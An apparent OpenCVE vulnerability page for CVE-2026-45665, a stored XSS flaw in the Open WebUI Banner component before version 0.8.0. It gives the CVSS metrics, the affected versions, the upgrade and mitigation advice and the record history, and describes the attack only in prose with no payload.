CVE-2026-45665 - Vulnerability Details

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token This vulnerability is fixed in 0.8.0.

Published: 2026-05-15

Score: 8.1 High

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

Open WebUI’s Banner component contains a stored cross‑site scripting flaw caused by executing DOMPurify before the marked library. An attacker with administrator privileges can inject malicious JavaScript into the global banner, which is rendered for all users, including the Super Admin. This enables the attacker to steal the Super Admin’s session token and gain full control of the system.

Affected Systems

The vulnerability affects the self‑hosted Open WebUI platform version prior to 0.8.0. Users must verify the installed version and plan an upgrade if they are running an earlier release.

Risk and Exploitability

The vulnerability has a CVSS score of 8.1. EPSS is not available and the issue is not listed in the CISA KEV catalog. Because the attack requires an authenticated administrator role, the likelihood of exploitation depends on whether an attacker has already compromised an administrator account. Once the banner payload is stored, all users will see the malicious script, allowing session hijacking of the Super Admin.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

open-webui

affected

Version	Status	Constraints
`< 0.8.0`	affected	—

No data.

Vendor Product Confidence Versions

Open-webui

100%

Version	Status	Scheme	Platform
`[0,0.8.0)`	affected	semver	—

Found an issue or want to improve our Enrichment? You can suggest it directly by opening an issue on our dedicated GitHub repository .

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Upgrade Open WebUI to version 0.8.0 or later to apply the security fix.
Restrict banner editing permissions to a minimal set of trusted administrators to limit the number of attackers who can inject malicious scripts.
Deploy a strict Content Security Policy that blocks inline JavaScript and disallows unsafe sources to mitigate the impact of any residual XSS payloads.

Generated by OpenCVE AI on May 15, 2026 at 23:52 UTC.

Tracking

Sign in to view the affected projects.

Advisories

Source	ID	Title
Github GHSA	GHSA-cqp4-qqvg-3787	Open WebUI has Stored XSS in Banner Component via Improper Sanitization Order

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required High

Scope Changed

Confidentiality Impact High

Integrity Impact High

Availability Impact None

User Interaction Required

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.0003.

Key SSVC decision points have not yet been added.

References

Link	Providers
https://github.com/open-webui/open-webui/security/advisories/GHSA-cqp4-qqvg-3787

History

Fri, 15 May 2026 23:45:00 +0000

Type	Values Removed	Values Added
First Time appeared		Open-webui Open-webui open-webui
Vendors & Products		Open-webui Open-webui open-webui

Fri, 15 May 2026 22:00:00 +0000

Type	Values Removed	Values Added
Description		Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token This vulnerability is fixed in 0.8.0.
Title		Open WebUI: Stored XSS in Banner Component via Improper Sanitization Order
Weaknesses		CWE-79
References		https://github.com/open-webui/open-webui/security/advisories/GHSA-cqp4-qqvg-3787
Metrics		cvssV3_1 `{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N'}`

Subscriptions

Open-webui Open-webui

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2026-05-15T21:42:34.264Z

Updated: 2026-05-15T21:42:34.264Z

Reserved: 2026-05-12T21:59:25.665Z

Link: CVE-2026-45665

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-15T22:16:55.920

Modified: 2026-05-15T22:16:55.920

Link: CVE-2026-45665

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-16T00:00:12Z

Weaknesses

CWE-79

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity Low

Privileges Required High

Scope Changed

Confidentiality Impact High

Integrity Impact High

Availability Impact None

User Interaction Required

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object